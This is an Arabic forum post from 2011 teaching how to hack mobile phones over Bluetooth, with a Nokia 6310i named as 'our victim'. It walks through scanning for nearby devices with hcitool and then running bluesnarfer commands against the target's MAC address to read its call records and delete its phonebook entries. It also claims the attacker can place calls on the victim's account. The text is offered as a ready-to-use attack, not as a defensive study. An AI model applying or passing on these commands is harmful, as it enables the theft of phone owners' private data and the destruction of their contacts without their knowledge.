قد يرى البعض ان الاختراق يقتصر على اجهزة الحاسوب فقط وعلى والسيرفرات التي هي ايضا اجهزة حاسوب عملاقة ولكن هذا الاعتقاد خاطئ جدا فالاختراق يكون لاي شيئ قد نتصوره من هواتف وطابعات واي شيئ يخطر على بالكم ومن المؤكد والاكيد ان كل جهاز له طريقته الخاصة في الاختراق وبادن الله اليوم سوف سنتطرق الى اختراق الهواتف النقالة والتي بالمناسبة اصبحت من اكبر مخاوف المهتمين بالحماية فتخيل انه يوجد شخص يعبث بهاتفك ويحدف ما يشاء فيه وانت لا تدري بل ويتكلم على حسابك.
بالطبع لو تمكن الهكر من اكتشاف هده الثغرات الخطيرة لعرف الاقتصاد هزة ما بعدها هزة ولقد كنت قد قرات مؤخرا عن حدوث 180 مكالمة مجانا من مصدر مجهول فقد تمكن احد الهكر من اختراق الهواتف النقالة واجراء عدة مكالمات ولحد الساعة لم يتم القبض عليه المهم ما يهمنا نحن الان هو كيفية الاختراق والتي هي في الحقيقة ثابتة لا تتغير بتغير الاجهزة فالمبدا واحد ولكن الطريق مختلفة فنحن عندما نخترق الحواسيب يجب اولا ان نتصل بها ويكون دلك بالطبع عن طريق الانترنيت او الشبكات نفس المبدا في الهواتف فلو اردنا اختراقها فيلزمنا اولا ان نتصل ويكون الاتصال عن طريق البلوتوت و هناك اتصال اخر وهو الدي سبق ان دكرته ولحد الساعة مازالت طريقة الحصول عليه مجهولة واقصد الاتصال عن طريق الرقم فقط لدلك سوف نتطرق للاول فقط وسوف تكون ضحيتنا Nokia 6310i .
واريد ان اشير فقط الى ان اختراق الهواتف النقالة اخطر من اختراق الحواسيب فادا كان حاسوب مثلا مصاب بثغرة فيمكننا ان نرسل له تحديث لاصلاحها اما الهواتف النقالة فلا يعني لو وجدت ضحية اخترقه كل يوم ان اردت دون ان يستطيع فعل شيئ
اولا يجب ان يكون الضحية قد فعل البلوتوت ثم بعد دلك نستعمل برنامج hcitool وهو برنامج يقوم بارسال اوامر خاصة الى اجهزة البلوتوت فادا تلقى ردا فسيقول لنا انه يوجد جهاز اسمه كدا وله mac address معين وهو يرد على اتصال البلوتوت
نقوم بتطبيق الامر
كود PHP:
hcitool scan hc0 ثم سوف يبدا في عملية المسح وسوف تكون النتيجة شبيهة بالتالي
كود PHP:
00:03:EE:3A:67:1F Nokia 6310i
حيث
كود PHP:
00:03:EE:3A:67:1F تمثل عنوان mac address الهاتف الدي هو في حالتنا Nokia 6310i
جيد فالان وجدنا الهاتف ولكن ساطرح عليكم سؤال ادا قمتم بمسح موقع باداة Nmap ووجدتم منافد والخدمات المركب عليها فهل سوف تخترقون الموقع بالطبع لا لانه يلزمنا اولا ثغرة نفس الشيئ هنا فنحن اخترنا هاتف Nokia 6310i فقط لان فيه ثغرة يمكن ان نستفيد منها عن طريق برنامج يسمى BlueSnarfing يعني لن ينجح الامر ادا كان هناك نوع اخر غير مصاب وبالمناسبة فبرنامج BlueSnarfing هو برنامج يسمح بحدف وتحميل وكتابة في قائمةالدليل وايضا بالتحدث على حساب الشخص .
والان لمعرفة الارقام التي اتصلت بهذا الهاتف ننفد الامر
كود PHP:
bluesnarfer -s RC -r 1-100 -b 00:03:EE:3A:67:1F ولحدف الدليل ننفد الامر
كود PHP:
bluesnarfer -w 1-100 -b 00:03:EE:3A:67:1F وهناك بالطبع عدة اوامر يمكن تطبيقها وتجدر الاشارة الى ان كل من برنامجي hcitool و bluesnarfer موجودان في نظام BackTrack لدلك كنت اقول نفد الامر وادا لم يكن لديكم هذا النظام فيمكنكم بالطبع تحميل هذه الادوات وتشغيلها على انظمتكم من الشل ودلك باضافة نقطة ثم "/" وتنفيد الامر
مثال على دلك
كود PHP:
./bluesnarfer -s RC -r 1-100 -b 00:03:EE:3A:67:1F ملحوظة
يجب ان يكون الحاسوب ايضا يتوفر على بلوتوت
:face:
♥ عدد مساهماتي ♥
الثلاثاء يوليو 19, 2011 7:28 pm
